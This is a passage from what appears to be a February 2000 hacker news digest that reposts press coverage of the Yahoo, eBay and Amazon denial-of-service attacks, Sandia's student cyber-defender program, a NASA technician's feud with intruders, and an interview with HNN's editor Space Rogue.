Yahoo has had small, short-term outages in the past, but nothing on this scale, the representative said. In August 1999, a glitch kept some customers out of their e-mail accounts for a few hours.

However, that's nothing compared to the problems eBay, E-Trade, Amazon.com and Egghead have experienced. For instance, eBay outages last year - including one that lasted 22 hours - prompted infrastructure upgrades that reduced revenues by $5 million and resulted in a 26 percent drop in the company's stock price.

The attack corresponded with a so-called "birds of a feather" meeting to discuss denial of service attacks at a conference in San Jose today sponsored by the North American Network Operators group, said Russ Cooper, editor of NTBugTraq.
"I would assume that whoever did it was doing it to impress those people who were getting together to talk about them."

The attack is fairly easy to do because there are Perl scripts and other executables that circulate that only require a server address to be inserted, he said. However, the fact that it was distributed indicates that "somebody was putting some thought behind it; coordinating it," Cooper said.

Yahoo is ranked as the Internet's top Web site with 36.4 million unique visitors in December, according to Media Metrix.

-=-

Wired;

Routers Blamed for Yahoo Outage
by Declan McCullagh and Joanna Glasner

5:00 p.m. 7.Feb.2000 PST

Most of the Yahoo network was unreachable for three hours on Monday as the company weathered what it described as a widespread malicious attack on its Web sites.

Attackers reportedly laid siege to the Internet's second most popular destination at about 10:30 a.m. PST, snarling Yahoo's internal network and denying millions of visitors access to mail, schedules, and the directory service.

An engineer at another company that receives Internet access from the same provider, Global Center, told Wired News the outage was due to misconfigured equipment. The person, who asked to remain anonymous, said that his firm also lost connectivity through Global Center's Sunnyvale, California, facility during the same time period due to apparent router problems, not hacker attacks.

Details remained sketchy, with service provider Global Center blaming an intentional surge in traffic and Yahoo claiming a cadre of as-yet-unknown vandals fouled their system. No Web content appeared to have been altered or deleted.

A Yahoo spokesperson called it a "coordinated distributed denial of service attack" against the company's San Francisco Bay Area data centers that originated from multiple places at the same time. The representative said the outage caused an "intermittent ability to access some, but not all, of our services."
But the offline sites rank among the most prominent. Yahoo's highly visible yahoo.com, broadcast.com, and my.yahoo.com sites were unreachable, although some other properties such as Geocities remained unaffected. A likely explanation: Geocities receives its connection from Exodus, while the yahoo.com and other affected sites connect to the Internet through Global Center.

"The Global Center network is not down. There've been no fiber cuts... This is a specific attack on Yahoo by external forces," said Secret Fenton, a spokeswoman for Global Center. "This affected accessibility to Yahoo, [which] hosts servers for its site at Global Center."

Global Center -- formerly FrontierNet -- is owned by Global Crossing, a Bermuda telecommunications firm. Other Global Center customers, such as Ziff Davis, MP3.com, and eToys.com, did not report any glitches.

Neither Yahoo nor Global Center representatives provided technical details, but the snafu seemed to originate with a router, and experts began speculating on what could have been the cause.

Jeff Schiller, MIT's network manager, said that a denial of service attack could be mistaken for router failure at first.

"They might have thought they had a bad card in a router, and they shut down the router and replaced the card, and the problem didn't go away," Schiller said. "They probably replaced equipment and then discovered that it didn't solve the problem."

Schiller speculated that any assault might have been a "Tribal Flood Network" attack. "If this is a denial of service attack, this is one of the first attacks against a public business."

The outage had the unusual effect of boosting the companies' shares. Global Crossing closed Monday at 50 5/16, up 1 1/8. Yahoo ended at 354, up half a point.

On the Motley Fool discussion groups, investors kvetched that they couldn't access their mail, news, or movie info -- while scratching their heads over the apparent non-effect of the snafu.
"Usually, when a portal has an outage the stock price goes down. Yahoo is holding up surprisingly well," one person wrote.

Keynote Systems, an Internet monitoring firm, said the Yahoo outage began between 10:15 and 10:30 a.m. (PST).

According to Media Metrix, only America Online reaches more people online than Yahoo.

@HWA

110.0 HNN: Feb 8th; New Hack City Video
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

New Hack City, a secret hacker hangout in San Francisco, is the subject of a new eleven-minute documentary by Joshua Backer. The film has been shown at the Rhode Island School of Design Senior Film Festival and the Animation/Video Festival of 1999. It has also received the prestigious RISD Murphy's Law Award. The film offers an interesting look into the private lives and minds of some well known hackers.

Underground Films
http://www.undergroundfilm.com/films/detail.tcl?wid=1001601

Streaming video. (Nice blank screen for an intro, since it's only 11mins long... - Ed)

@HWA

111.0 HNN: Feb 8th; Thailand E-commerce Site Stored Credit Cards on Mail Server
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by raybanth

An individual using the name Curador posted credit cards, claimed to be stolen from shoppingthailand.com, to Yahoo and then Geocities last week. He was barely able to stay one step ahead of the sites taking the pages down. Officials in Thailand are now trying to determine if he did in fact break into the sites as he claimed. A review of the sites in question found that they stored the credit card numbers on the mail server.

Bangkokpost.net - Warning, it is slow
http://www.bangkokpost.net/today/080200_Business03.html

Not Found
The requested URL /today/080200_Business03.html was not found on this server.
Apache/1.3.11 Server at www.bangkokpost.net Port 80

(Sorry ........ - Ed)

@HWA

112.0 HNN: Feb 8th; Script Kiddie Training
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by turtlex

By downloading the latest scripts from the web, students at San Jose State University who are enrolled in the Sandia National Laboratory College Cyber Defenders Program are learning to become glorified script kiddies. (Maybe they are learning other stuff but that isn't mentioned in this article.)

Washington Post
http://washingtonpost.com/wp-srv/WPlate/2000-02/05/078l-020500-idx.html

Launching a Counteroffensive in Cyberspace
Program Training Corps of Experts in Computer Security

By Vernon Loeb
Washington Post Staff Writer
Saturday, February 5, 2000; Page A03

LIVERMORE, Calif.—Eric Thomas hacks into Jason Arnold's computer with a few simple keystrokes, sniffing Arnold's password, hijacking his online session and stealing all the data on his screen.

It's easy enough. Thomas launches the attack, an ingeniously malicious script of Czech origin that he's downloaded from the Internet, without Arnold ever knowing what hit him.

"I'm watching everything he's doing right now," Thomas says, peering at his computer screen. He types in another command and declares victory: "I've taken over his connection!"

As it happens, Thomas and Arnold are seated 10 feet apart here at the Northern California branch of Sandia National Laboratory, the nation's best-equipped computer attack simulation center. This is a place where it is quickly apparent that the thrust and parry between cyber-attackers and cyber-defenders has evolved further than non-experts may realize--and that the defenders are not as hapless as the American public may think.

Both Thomas, 20, and Arnold, 18, are students at San Jose State University with a flair for computers.
And both are just the type President Clinton had in mind last month when he proposed a national scholarship program to train cyber-security experts in return for four years of public service once they graduate.

The two young men are part of the vanguard, already enrolled in Sandia's College Cyber Defenders Program, an initiative of computer security guru Fred Cohen. A principal member of Sandia's technical staff, Cohen, 43, is credited with inventing the computer virus as a graduate student at the University of Southern California in 1983. Like Clinton, he believes the current security environment is more precarious than ever, having spent the past 17 years pioneering defenses against all forms of cyber-attack.

The attackers are becoming bolder and more sophisticated, Cohen said, while most people using computers know little--and seem to care even less--about protecting their machines.

"This disconnect between technology and how people behave is getting broader, not narrower," Cohen said.

But within the federal government, the picture is more encouraging. The Pentagon's computer defenses have improved by "an order of magnitude over the past five years," according to Cohen. While the government still makes its share of blunders in cyberspace, he said, its combined expertise for defending computer systems and waging cyberwar "is probably the best in the world--by a long ways."

Such prowess isn't always readily apparent, with hackers taking down federal Web sites with regularity and Clinton sounding the alarm about cyber-terrorism in his budget proposal for fiscal 2001, which contains $2 billion in computer defense initiatives.

But the Pentagon started funding the government's first computer emergency response team, or CERT, at Carnegie Mellon University 12 years ago after the so-called Morris "worm" was unleashed on the Internet and spread to 6,000 computers.
Now most federal departments and agencies staff their own CERTs, the infantry in a growing cyber-security command structure. At the FBI, the National Infrastructure Protection Center is responsible for fighting cyber-crime, taking many of its leads from CERTs throughout the executive branch. At the Pentagon, a newly created center in Arlington called the Joint Task Force-Computer Network Defense is responsible for coordinating all computer defenses throughout the military. And at the General Services Administration, the Federal Computer Incident Response Center plays the same role for all civilian computer defenses. The price tag for these forces this fiscal year: $1.5 billion.

Cohen himself is a one-man computer defense conglomerate, beginning with an 18-member research staff on cyber-security he directs here at the California branch of Sandia, which has its headquarters in New Mexico. Dressed in blue jeans and Birkenstocks, he explains that he developed the College Cyber Defenders Program for much the same reason Clinton proposed the $25 million scholarship program.

"Ph.D. researchers are very expensive, they're hard to find, and the [national] labs don't pay as much as Silicon Valley," Cohen said. "It's build or buy these employees--and you can't buy them. So you have to build them."

The son of two physics professors, Cohen is also an adjunct professor at the University of New Haven in Connecticut and an expert in the nascent field of computer forensics--tracking digital crimes. And he runs a private consulting business, advising companies on how to protect their computer systems. One of his tactics is to show clients that they are theoretically vulnerable to attacks that could disable factories, cause chemical spills, or steal millions of dollars.

With such experience, Cohen is deadly earnest about the threat of cyber-war.
He joined Sandia's technical staff, he said, because he saw "the potential for attacks on the critical infrastructure that could cost millions of lives and change the course of nations."

Lance J. Hoffman, director of the Cyberspace Policy Institute at George Washington University, said most experts believe it is only a matter of time before a disastrous computer assault takes place.

"The government does have resources in computer security and information assurance," Hoffman said. "But there is no such thing as perfect security. . . . I hope Congress does not wait until the aftermath of a cyber-disaster to take action."

In Sandia's cyber-defenders program, Cohen downloads attack programs posted on hacker Web sites and assigns his students to run them against a variety of operating systems, figure out how they work and devise ways to defeat them. The suggested defenses are then posted on the Internet.

"Attackers share, but defenders don't share as well," Cohen said.

With the program nearing its first anniversary, students working part-time for $10 to $12 an hour have already modeled 400 attacks. Cohen has 1,800 more planned, and he figures his students will be caught up by the end of this summer, when the number of participants in the training program will double to 25.

One day last month, Corbin Stewart, 28, who has a degree in history and is studying computer science at Las Positas Community College, launched his 100th simulated attack, a script called seyon exploit.sh. It comes with a disclaimer: "Please use in a responsible manner."

But seyon exploit.sh was written with unconcealed malice, designed to allow whoever launches the code to gain root access to an improperly protected Unix operating system.

"It's privilege expansion," Cohen said as Stewart fired away. "They become the super-user on your computer--they can read, write, modify anything.
They can cause it to crash, they can use it to attack other computers, they can install sniffers, Trojan horses to get back in--it's all theirs." The threat, of course, is relative--and often grossly exaggerated, Cohen said. Hackers launching seyon exploit.sh or other commonly available attack scripts could damage somebody's home computer or business server, Cohen said, but it is highly unlikely that they could bring down U.S. military networks. Most hackers lack the expertise to penetrate sophisticated defenses or sustain their attacks, Cohen said. Hacking into a federal government Web site, he said, typically causes little more lasting damage than spray-painting a sign outside a government office. But when Clinton said last month that "hostile powers and terrorists can now turn a laptop computer into a potent weapon capable of doing enormous damage," he was not, in Cohen's opinion, exaggerating at all. A hacker may not be able to disrupt the Northeast's power grid, Cohen said, but the Russian government--with legions of computer scientists, years of expertise and a sophisticated understanding of how power systems work--probably could, if it wanted to.

© Copyright 2000 The Washington Post Company

@HWA

113.0 HNN: Feb 8th; Personal CyberWars
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
contributed by Evil Wench

How long do grudges last in cyberspace? An interesting story covering the activities of one NASA tech guy trying to protect his network and a band of cyber intruders trying to break in.

Forbes
http://www.forbes.com/forbes/00/0221/6504068a.htm

February 21, 2000

Don't romanticize kids who hack their way into computers. They can go from mischievous to malicious in a click.

A Private Little Cyberwar
By Adam L. Penenberg

JAY DYSON KNOWS THE EXACT moment his life began to unravel. It was 10 a.m. on Mar.
5, 1997, when Dyson, a techie for the National Aeronautics & Space Administration in Pasadena, Calif., discovered that NASA had been hacked. A gang puckishly named Hagis--Hackers Against Geeks in Snowsuits--had commandeered the "root" directory of some NASA computers, gaining partial control of the network and lacing it with password "sniffers" and "back doors" to let them return at will. They replaced NASA's home page with their own, decrying commercialization of the Internet with an almost comical ominousness. "All who profit from the misuse of the Internet will fall victim to our upcoming reign of digital terrorism," Hagis declared. "The commercialization of the Internet stops here." Dyson, part of a team charged with spotting intrusions and patching security holes, took this all too personally. Then he made his first mistake: He bashed Hagis online, posting the attack on his own Web site. "You are just a bunch of lame kids," he wrote. That seemingly meek counterpunch sparked a cyberwar over the next two years, pitting Dyson, 37, against two Hagis members known as Euphoria and Trout, or in hacker lingo, "u4ea" and "tr0ut." Hackers are often depicted as mischievous antiheroes of the computer revolution: Sure, they break in, but they don't really hurt anyone. Jay Dyson's tale points up a meaner side. His foes hacked two Internet service providers to get to him. They cracked his home business, harassed his wife and, he says, cost him his marriage. The digital intruders could do most anything they wanted to harass Dyson online; no one was able to stop them. He fears his tormentors won't cease--and now is plotting measures to stop them, himself. "I look at the trail of destruction Euphoria and Trout have left, and I still don't know anything about them," he says. "But I know my day will come." Iowa born and bred, Dyson discovered computers at age 6, when his father, an IBMer, took him to work one night and showed him a mainframe sending data to a teletype printer. 
"I was enthralled. I had to understand this magic." At age 15 he vowed to work for NASA someday. He dropped out of college in 1983, went into high tech and started doing work for NASA in 1995. At work his nickname is "the pit bull." "Once I sink my teeth into something, I don't stop until it stops struggling." Dyson calls himself a "white hat" hacker who blocks break-ins and alerts software makers to security lapses. Online, he hangs out at hacker haunts, trading quips and tracking break-ins. Government sites are big game for hackers, and NASA is a natural target. At first, Hagis seemed harmless. It has breached Yahoo and propeller-head sites Slashdot and Rootshell. Each time, it engaged in a little nanny-nanny-boo-boo and made demands for the release of a jailed hacker hero, Kevin Mitnick. When Hagis cracked the Greenpeace site last year, it posted a warning: "Phree Kevin Mitnick or we will club 600 baby seals." (Mitnick finished a five-year prison sentence last month.) Dyson sympathized with Hagis' anticommercial sentiment but thought it silly to make the point on a NASA site. In his digital diatribe, he said it wasn't "what real hacking is about" and dared them to attack a commercial site. Instead, Hagis attacked him, prying into Dyson's home page on the Web to rewrite his broadside to say: "You guys are elite" (deleting "lame"). Dyson restored his page, and the intruders revised his directory file names to read: "You will pay for your stupidity." Dyson retorted: "Can't you stand free speech?" Evidently not. The hackers retaliated by taking down the Internet firm that provided Dyson's access. They planted a "poison pill" that deleted everything on the network. The firm, Nyx, had to shut down for two weeks to fix it. Dyson surfed hacker chat rooms and e-mail lists, asking where he might find "u4ea" and "tr0ut." He didn't go to the police. "They have no freaking clue."
Things quieted down, but he started buying guns, including a 9mm Intratec pistol, a .45, a shotgun and a .357 Magnum. In September 1997 Hagis hit Yahoo, and Dyson worried he would be next. Three months later his home and home-business phones were disconnected. The phone company said someone had ordered the cutoff; it wasn't Jay Dyson. Then u4ea and tr0ut struck again, breaking into the online account of Dyson's wife, Kathleen, at the California Institute of Technology. They left her a message: "All the Dyson family will pay for the mistakes of Big Jay." This frightened her. Kathleen began to cry for hours on end, and the couple bickered constantly over Dyson's relentless pursuit of the hackers. She ended up on disability, "due in no small part to the harassment," he claims. But he refused to end his digital jihad. In January 1998 tr0ut and u4ea cracked into a second Internet-access firm that Dyson uses, PacificNet. This time they sabotaged Dyson's home business site, Point-2-Point Presence, a Web design firm, deleting files. As Dyson took to the keyboard to make repairs, they brazenly messaged him "live," slipping back in through the access firm's Unix operating system. Dyson asked what they wanted. "Stand on one leg, hop up and down three times and say 'Hagis rules!' three times," they commanded. "Done," Dyson typed back. He was trying to keep the hackers online long enough for PacificNet to trace them. It did not work. The next day Dyson reported the incidents to NASA. He was ordered to ignore Hagis. "All I ever wanted was to work for NASA, and they tell me if I wanted to keep the job I love, I'd have to turn the other cheek," Dyson fumes. He dropped the case at work, "but redoubled my efforts on my own time." Stephen Nesbitt, a director in NASA's Computer Crimes Division, says the feud isn't an agency concern and suggests Dyson should call the FBI.
The only time the law intervened, Dyson says, was when FBI agents paid him a visit last August while investigating the hack of the New York Times Web site almost a year earlier. Somehow Dyson, in his surfing of hacker sites, had drawn their attention. They accused him of being "Sidekick Slappy," a member of Hacking for Girlies, the gang that took down the Times site. (Those who know Sidekick Slappy say this: Jay Dyson is no Sidekick Slappy.) Meanwhile, his marriage crumbled. Dyson's obsession alienated his wife, and in June 1998 they separated. "My wife wanted to run and hide, and I wanted to fight," Dyson says. They later divorced; she declines to talk about it. Feeling alone, Dyson started smoking and losing weight--more than 50 pounds in five months, 100 pounds eventually. Some NASA colleagues say he should have dropped it. "Jay kept kicking at this beehive, then wondering why he kept getting stung," says one. Then came an arrest in the NASA hack. In April 1998 the Royal Canadian Mounted Police in Sudbury, Ontario, arrested Jason Mewhiney, now 23, and charged him with 46 counts of criminal mischief, illegal entry and other charges. Mewhiney's hacker handle: tr0ut, police said. He pleaded guilty last month to 12 counts and now is serving six months in jail. Says Dyson: "He's fortunate the law got there first." Online, tr0ut was malicious. In jail, Jason Mewhiney is clean-cut and "very shy--until you put him in front of a computer," says Corporal Alain Chabot, one of the arresting officers. "Sometimes these kids are Einsteins in front of their screens, but drop them off downtown without a bus map, and they're helpless." Dyson's other nemesis, u4ea, is still at large. Word in the hacker underground is that u4ea is a mole, but an FBI spokeswoman denies it and says an investigation continues. Dyson believes he has traced u4ea's identity to that of a young man in the Washington area, but he isn't handing that information to the FBI. 
Dyson wants to exact his own revenge. "I have no intention of dragging u4ea to the authorities," he says, fingering his .45. "This is strictly between him and me. I will do whatever it takes to see this end come about."

@HWA

114.0 HNN: Feb 8th; Space Rogue Profiled by Forbes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
contributed by Space Rogue

An interesting question and answer session between Adam Penenberg of Forbes magazine and Space Rogue, editor of the Hacker News Network.

Forbes
http://www.forbes.com/columnists/penenberg/index.htm

Adam Penenberg is a senior editor at Forbes magazine and a regular contributor to the Forbes Digital Tool.

I first met Space Rogue, founder of Hacker News Network (HNN), at Defcon, the annual hacker/undercover agent convention held in Las Vegas. Sipping beer and sweating from the Nevada heat, we sat next to each other at a seminar on social engineering--how to trick people into passing you information. Afraid of potential legal ramifications, Defcon organizers had banned media from the event, but unlike Space Rogue, I wasn't sporting press credentials; I figured that would be like putting a big "kick me" sign on my butt. While a geek on stage tried to dupe a Microsoft tech support operator, a Wired News reporter was ejected from the hall. Then the bouncer turned on us. "You have to leave," he commanded Space Rogue, fingering his press pass. "You," he said, pointing at me, "can stay." "But I'm Space Rogue," said Space Rogue, turning his badge around to show the HNN sticker he had applied to the back. "From Hacker News? Sorry, man, you're cool," said the guard. Everyone in the hacking and computer security world knows Space Rogue. In 1998, while a member of the L0pht Heavy Industries, a hacker think tank based in Boston, he testified before the U.S. Senate on the state of government computer security.
He is the publisher of Hacker News Network, a resource as dear to the cyber-cognoscenti as Merriam-Webster's is to writers. Recently, Space Rogue, along with the rest of L0pht, joined @Stake, a newly formed Internet security company funded by the hot venture capital firm Battery Ventures. As for his real name, well, he won't tell me. But he did tell me a lot about hobnobbing with senators, cyber-terrorists, white hats, script kiddies and the reason Hacker News Network doesn't use the word "hacker."

Q: How did you get into hacking?

A: That's like asking someone how he learned to read. I suppose my first 'real' hacking experience was with an Osborne 1 and CPM, when I taught myself BASIC. This was back in 1984. Or maybe it was earlier than that, when I was a kid making homemade flashlights out of discarded batteries so I could read at night when I was supposed to be sleeping. After the Osborne I graduated to the Commodore 64. I remember the local computer store sold Elephant floppies for two dollars each. Then came a Mac SE with dual floppies and 1 megabyte of RAM for $2,000. I still have that machine and the original box it came in.

Q: Why are the vast majority of hackers male?

A: For the same reason most physicists and mathematicians are male. Most girls are taught early on that technology is not feminine, therefore taboo. Society is starting to change, opening itself up to new acceptable ideologies.

Q: What exactly is L0pht? How did you come up with the name?

A: The original location of L0pht Heavy Industries was in the loft of an old warehouse in South Boston, where we stored unused equipment, stuff like a Vax 11/780 that was too big to put in your house. The Heavy Industries part came from a Japanese anime film. Somewhere in the movie was a company with a name like Matsasumo Heavy Industries. We wondered, What the hell is a 'Heavy Industry'? But we thought it was cool so it stuck.

Q: What was it like to testify before Congress in 1998?

A: It was a great experience.
Everyone we met, from the senators to the aides, was extremely nice, which we didn't expect. They even let us use our 'handles,' so the name 'Space Rogue' is permanently etched into our nation's historical record--which blows me away when I think about it. We got copies of the testimony from the government printing office, and it's pretty amazing to see Space Rogue, Senator Thompson and Senator Glenn all on the same page. Getting reimbursed for travel presented a problem as the accounting office couldn't very well make out a check to 'Space Rogue,' so Senator Thompson's office arranged it so we could get reimbursed in cash.

Q: Why did you start the Hacker News Network?

A: HNN started as a competition among a small group of friends to see who could distribute hacker-related news the fastest. Well, it wasn't really a competition, but I guess I won anyway. We hope that HNN is providing a service to the community; this is why it was originally started. In the beginning we were trying to make money on the site, so we carried advertising. This sort of went against the old-school hacker mentality, but we weren't trying to get rich; we just wanted to make the site self-sustaining. Since L0pht's merger with @Stake, we will be removing those ads completely over time. It is important for @Stake to remain completely vendor-neutral, and advertising doesn't allow us to do that.

Q: What is @Stake and why is it unique among Internet security consultancies? What is your relationship to @Stake?

A: I am an employee of @Stake--actually I think my business cards say 'Research Scientist,' and yes, they also say Space Rogue. I honestly think @Stake is really going to shake up the industry; I mean look at what L0pht has been able to accomplish. Everything the eight of us did was basically as a part-time endeavor with no funds. Take L0pht to the next level--full-time staff, corporate muscle, some new technology--and what do you get? You get @Stake.
Q: What is the greatest misperception about hackers?

A: The general public seems to think that hackers equal criminals. I suppose depending on your definition of the word that may be true, although it is definitely not my definition. Because there are so many definitions of the word, HNN has stopped using the words hacker and cracker altogether, because it does not matter in what context I use the word, someone will send me mail and tell me it's wrong. This is kind of ironic, since this is supposed to be the 'Hacker' News Network.

Q: What is a 'white hat' hacker, and what is a 'script kiddie'?

A: Again the definitions vary, but in general a white hat hacker is someone who uses hacking methodologies and techniques but doesn't break the law. A 'script kiddie' is an old word in the underground that is just now becoming popular in the mainstream media. It describes someone who uses prewritten scripts to exploit security vulnerabilities, instead of coding his own--like an armed robber who knows nothing of ballistics or expanding gas theory, but knows how to pull a trigger.

Q: Why should companies hire hackers? How could they ever trust them?

A: Companies already hire hackers, they just don't know it. I mean, there is no national hacker registry to check on someone's hacker status. Any company that comes out and says 'We do not hire hackers' is deluding itself. We have to work somewhere, and more often than not we work at jobs that have cool technology. Of course, criminals should not be trusted or hired. But hackers, according to my definition, should be hired by every company. Any employee who has an innate curiosity about the systems he, or she, is working with, and who will not sleep until problems are solved, would benefit any business.

Q: Is cyber-terrorism a real threat, or is it all hype?

A: When we testified before Congress about being able to disable the Internet, a lot of people thought we were joking.
Afterwards we received a lot of e-mail asking, "Hey, is this how it's done?" We were like, well, that's not the method we thought of, but yeah that'd work. Of course, we have no motivation to take down the Internet; it's where we live and play and earn a living, so why would we destroy it? That said, governments are definitely hyping the threat of cyber-terrorism. While a threat does exist, I don't think it's as bad as some officials would lead you to believe. The scary part is governments are jockeying for position in the next 'cyberwar.' Over the last couple of years nations have been beefing up their cyber defenses. Defense is good; I have no problem with defense. But countries seem to be preparing offensive cyber capabilities. Offense often begets defense, so the escalation begins. And what happens when military offensive capabilities start to trickle down into the private sector? Now that is a scary thought.

@HWA

115.0 HNN: Feb 9th: Yahoo, Buy.com, Amazon, E-Bay, CNN, UUNet, Who's Next?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
contributed by Space Rogue

The Day the Internet Melted

Monday's Denial of Service attack on Yahoo was repeated yesterday afternoon at Buy.com and quickly followed by attacks on Amazon, E-Bay, CNN and possibly even UUNet. Most of the sites were able to block the attack and were back online within an hour or two. The San Francisco office of the FBI has opened an investigation into the attack on Yahoo; however, it is unknown how far the investigation has gotten at this point. Some of the affected companies have also started their own investigations into how this has happened. A source close to one of the affected companies has told HNN that they have been able to trace the attack back to one end node where they found a list of up to ten thousand possibly compromised systems.
E-Bay System Status
http://www2.ebay.com/aw/announce.shtml
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2434923,00.html?chkpt=zdhpnews01
CNNfn
http://cnnfn.com/2000/02/08/technology/yahoo/
CBS
http://cbs.marketwatch.com/archive/20000208/news/current/buyx_attack.htx?source=htx/http2_mw
C|Net
http://news.cnet.com/news/0-1007-201-1545383-0.html?tag=st.ne.1002.tgif?st.ne.fd.gif.d
Bloomberg
http://quote.bloomberg.com/fgcgi.cgi?ptitle=Top%20Financial%20News&s1=blk&tp=ad_topright_topfin&T=markets_bfgcgi_content99.ht&s2=blk&bt=blk&s=d71082934889b6a780eecbacbb10e177
CNN
http://cnn.com/2000/TECH/computing/02/09/cyber.attacks.01/index.html
Wired
http://www.wired.com/news/business/0,1367,34203,00.html
Wired
http://www.wired.com/news/business/0,1367,34221,00.html
Associated Press - via Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500165399-500209859-500970793-0,00.html
Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/20000209/bs/tech_hackers_2.html

Distributed Denial of Service attacks, DDoS

Distributed Denial of Service attacks aren't new; they have been around for a while. The basic premise is to use a large number of systems to request information from a single server, similar to a radio call-in contest where potential contestants get busy signals. Seldom is data lost or access inside the targeted systems gained; however, visitors to the site are prevented from accessing data. The large number of systems used to launch the attack can easily be controlled by one person. The CERT Coordination Center held a workshop concerning this type of attack back at the beginning of November.

Results of Distributed-Systems Intruder Tools Workshop
http://www.cert.org/reports/dsit_workshop.pdf

CERT has also released a couple of advisories warning system administrators about the dangers of this kind of attack.
CERT Advisory CA-99-17 Denial-of-Service Tools
http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html
CERT Advisory CA-2000-01 Denial-of-Service Developments
http://www.cert.org/advisories/CA-2000-01.html

CNN: More sites hacked in wake of Yahoo!
eBay, Buy.com, CNN.com and Amazon come under attack; FBI probes Yahoo! incident
By Staff Writer David Kleinbard
February 08, 2000: 8:19 p.m. ET

NEW YORK (CNNfn) - The Internet was reeling Tuesday night as attacks by hackers on a number of high-profile Web sites continued. In the early evening Tuesday, CNN.com confirmed that it was the latest site to suffer. "At 7 p.m. EST, we were attacked by hackers. A denial of service attack occurred until 8:45 p.m. We were seriously affected. We were serving content but it was very inconsistent and very little," Edna Johnson, director of public relations for CNN Interactive, said in a statement. "By 8:45 p.m., our upstream providers had put blocks in place that are shielding us and we are now serving content." CNN.com and CNNfn.com are both owned by Time-Warner Inc. (TWX: Research, Estimates). The leading auction Web site eBay and the Internet-based discount retailer Buy.com were crippled Tuesday by outside attacks. And online retailing giant Amazon also came under siege late Tuesday. Amazon.com Inc.'s (AMZN: Research, Estimates) Web site was virtually shut down Tuesday with problems that appeared similar to the failures that have hit other popular Web sites in recent days. Amazon said in a statement that its site was inaccessible for more than one hour late Tuesday because a "large amount of junk traffic" was aimed at the company's computers, tying them up and preventing nearly all its customers from making purchases.

FBI investigates Yahoo! attack

The incidents on Tuesday at Buy.com (BUYX: Research, Estimates) and eBay Inc. (EBAY: Research, Estimates) came one day after a hacker onslaught knocked Yahoo!'s heavily trafficked web site out of service for about three hours.
Yahoo! (YHOO: Research, Estimates) said that it is cooperating with the FBI and other law enforcement agencies in an investigation of who perpetrated the cyber attack. Tuesday's attack, which hit Buy.com around 11 a.m., came on the same day that the company did its initial public offering. The Aliso Viejo, Calif.-based seller of books, computer hardware, software, videos, and other items sold 14 million shares at $13 each, raising $182 million. Buy.com's stock finished the day at 25 1/8, up 93 percent, despite the incident. "Around 11 a.m., we got hammered, and as a result had some difficulty getting the site back up," Buy.com's CEO, Gregory Hawkins, said in a televised interview with CNNfn. Hawkins said Buy.com is working with the company that hosts its web sites, Exodus Communications Inc., to determine how the attack occurred. Hawkins said that Buy.com appears to be the victim of the same type of cyber attack that crippled Yahoo! Inc.'s web site for about three hours on Monday. Yahoo!, the Internet portal based in Santa Clara, Calif. that is the world's most heavily trafficked web site, was shut down by what web security experts call a "denial of service attack." In that form of assault, a company's web servers are hit with such a large number of bogus requests that they cannot provide information to the site's legitimate users. It's like flooding a road with so many cars that other vehicles can't get through. eBay, a San Jose Calif.-based site where individuals buy and sell millions of diverse items each day, placed a notice on its site around 3:20 p.m. Pacific Standard Time that it had come under what appeared to be a denial of service attack generated by outside sources. "The attack appears to be affecting only the site's static pages, not its bidding, listing, and search functions," said eBay spokeswoman Kristin Seuell. "However, we have heard reports from the East Coast that people are having difficulty accessing the site." 
Static pages are those containing information that remains the same at all times. Internet security experts predicted on Tuesday that other commercial web sites will be hit by denial of service attacks in the future, even before they knew about the Buy.com incident. "There hasn't been a global solution yet to this problem," said Chris Rouland, director of the security research team at Internet Security Systems (ISSX: Research, Estimates) in Atlanta, Georgia, a major security software and consulting company. "If hackers can shut down Yahoo!, they can shut down anything they want tomorrow." Security experts were surprised that Yahoo! could be crippled by outsiders because the company's site has a reputation for having a high level of security and reliability. In fact, Tuesday's incident was Yahoo!'s first significant service interruption. "The Yahoo! web site is normally among the fastest and most reliable on the Internet," said Gene Shklar, vice president of public services at Keynote Systems Inc., (KEYN: Research, Estimates) a San Mateo, Calif. company that measures the performance and reliability of e-commerce web sites. "Yahoo! consistently delivers its home page during business hours in an average of 1.5 seconds to T-1 connected locations around the U.S. with a reliability of 99.3 percent or better." Keynote's stock soared 17 1/16 to 113 9/16 Tuesday, apparently in response to the media attention from Yahoo!'s service interruption. Yahoo!'s stock rose 19 1/8 to 373 1/8, as investors and analysts seemed pleased by the speed with which Yahoo! was able to recover from the attack. Lise Buyer, an analyst at CS First Boston, said in a research report Tuesday that the incident should have no impact on Yahoo!'s bottom line. "Given unused capacity and rapidly increasing pageviews, we expect the company will have no trouble making good on any advertising impression commitments. Therefore, we expect no impact on the company's operating statistics," Buyer said. Yahoo! 
said Tuesday that it has been contacted by law enforcement agencies, including the FBI, that are investigating the incident. "We are doing our part to work with the authorities by gathering the electronic tracers and data available," a Yahoo! spokeswoman said. "We will be sitting down with them over the next few days to discuss the appropriate next steps. The FBI is one group we anticipate meeting with." Yahoo! has dense layers of encryption that protect the databases on its site. Yahoo!'s customer information and site data weren't compromised by the attack, a company spokeswoman said Monday. Yahoo! said that the bogus requests came from up to 50 different Internet addresses at rates of up to a gigabyte per second, which is considered to be an enormous amount of web traffic over a short period of time.

The history of the problem

